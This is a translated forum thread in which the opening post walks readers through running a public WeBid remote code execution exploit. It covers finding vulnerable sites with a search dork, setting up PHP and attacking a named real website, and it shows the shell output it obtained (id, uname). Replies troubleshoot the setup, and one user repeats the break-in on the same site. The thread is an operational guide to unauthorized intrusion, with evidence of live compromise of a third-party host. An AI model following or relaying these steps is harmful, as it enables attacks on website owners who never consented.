Thread Closed
WeBid remote exploit PHP shell
#1
This is based on the following:

http://www.exploit-db.com/exploits/17487/

1. Copy it, then save it under any name you like as a .php file

2. Search for the vulnerability with the dork "powered by WeBid"

3. Install php5-curl
Code:
sudo apt-get install php5-curl

4. Replace the "#" with ";" in /etc/php5/cli/conf.d/mcrypt.ini
Code:
# configuration for php MCrypt module
extension=mcrypt.so
Change it to
Code:
; configuration for php MCrypt module
extension=mcrypt.so

5. Run it with the PHP CLI

root@eichel:~/Downloads# php 17487.php http://mcs-1.com/webid/

+----------------------------------------------------------------------+
| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |
+----------------------------------------------------------------------+

webid-shell# id
uid=776(mcscom) gid=773(mcscom) groups=773(mcscom)

webid-shell# uname -a
Linux host104.kvchosting.com 2.6.18-374.3.1.el5.lve0.8.44 #1 SMP Mon Oct 3 18:27:54 EEST

Done .. that is just one example .. as for other examples, go ahead :p
Be careful, friends who are using that application ...

FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
Wait, what? Hahahaha :)
An Ordinary Indonesian.

#3
Mind if I give it a try, bro? Hehe.

#4
Code:
$ ls -la /etc/php5/conf.d/
total 48
drwxr-xr-x 2 root root 4096 2012-04-12 21:06 .
drwxr-xr-x 5 root root 4096 2011-05-10 14:40 ..
-rw-r--r-- 1 root root   54 2011-05-03 07:59 curl.ini
-rw-r--r-- 1 root root   57 2011-05-03 07:59 mysqli.ini
-rw-r--r-- 1 root root   56 2011-05-03 07:59 mysql.ini
-rw-r--r-- 1 root root   52 2011-05-03 07:59 pdo.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 pdo_mysql.ini
-rw-r--r-- 1 root root   65 2011-05-03 07:59 pdo_pgsql.ini
-rw-r--r-- 1 root root   62 2011-05-03 07:59 pdo_sqlite.ini
-rw-r--r-- 1 root root   61 2011-05-03 07:59 pgsql.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 sqlite3.ini
-rw-r--r-- 1 root root   58 2011-05-03 07:59 sqlite.ini

There is no mcrypt.ini, so what is it that gets changed?
Hehe, bear with me, I'm a new user.
(04-12-2012, 10:11 PM)Divha Wrote:
Code:
$ ls -la /etc/php5/conf.d/
total 48
drwxr-xr-x 2 root root 4096 2012-04-12 21:06 .
drwxr-xr-x 5 root root 4096 2011-05-10 14:40 ..
-rw-r--r-- 1 root root   54 2011-05-03 07:59 curl.ini
-rw-r--r-- 1 root root   57 2011-05-03 07:59 mysqli.ini
-rw-r--r-- 1 root root   56 2011-05-03 07:59 mysql.ini
-rw-r--r-- 1 root root   52 2011-05-03 07:59 pdo.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 pdo_mysql.ini
-rw-r--r-- 1 root root   65 2011-05-03 07:59 pdo_pgsql.ini
-rw-r--r-- 1 root root   62 2011-05-03 07:59 pdo_sqlite.ini
-rw-r--r-- 1 root root   61 2011-05-03 07:59 pgsql.ini
-rw-r--r-- 1 root root   60 2011-05-03 07:59 sqlite3.ini
-rw-r--r-- 1 root root   58 2011-05-03 07:59 sqlite.ini

Eh, never mind, got it.
Sorry. Delete the post if need be.

There is no mcrypt.ini, so what is it that gets changed?
Hehe, bear with me, I'm a new user.

Code:
Follow @MafiaChoco

#5
root@eichel:/etc/php5/cli/conf.d# ls
curl.ini mcrypt.ini mysql.ini pdo_mysql.ini sqlite3.ini
gd.ini mysqli.ini pdo.ini pdo_sqlite.ini sqlite.ini
root@eichel:/etc/php5/cli/conf.d#

So it's not /etc/php5/conf.d ... but /etc/php5/cli/conf.d/

#6
I can't find the mcrypt.ini file :P
Ah, found it. Turns out I hadn't installed it yet, so for anyone who can't find it, please install it first with apt-get install php5-mcrypt :P
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#7
Same here, I can't find it >:(

What is mcrypt.ini actually for...? :P

Code:
; configuration for php MCrypt module
extension=mcrypt.so

What does that mean...? :D

--------------------------------------------------------------
I didn't edit that but I could still get in,

Code:
root@bt:~# php qw.php http://mcs-1.com/webid/

+----------------------------------------------------------------------+
| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |
+----------------------------------------------------------------------+

webid-shell# id
uid=776(mcscom) gid=773(mcscom) groups=773(mcscom)

webid-shell#


#8
Yes, that really isn't needed if the file isn't there... I just happened to have it, so I mentioned it so that you could edit it first if possible ...

#9
(04-13-2012, 12:16 PM)zee eichel Wrote: Yes, that really isn't needed if the file isn't there... I just happened to have it, so I mentioned it so that you could edit it first if possible ...


Why does it come out like this:

Code:
root@sundach40s:/home/dheanx# ; configuration for php MCrypt model extension=mcrypt.so
bash: syntax error near unexpected token `;'

Never Tired of Continuing to Learn



#10
Oh, so that's how it is :)
Thanks!
The white one, the one who should take action and be talented!
Linuxtivist blog

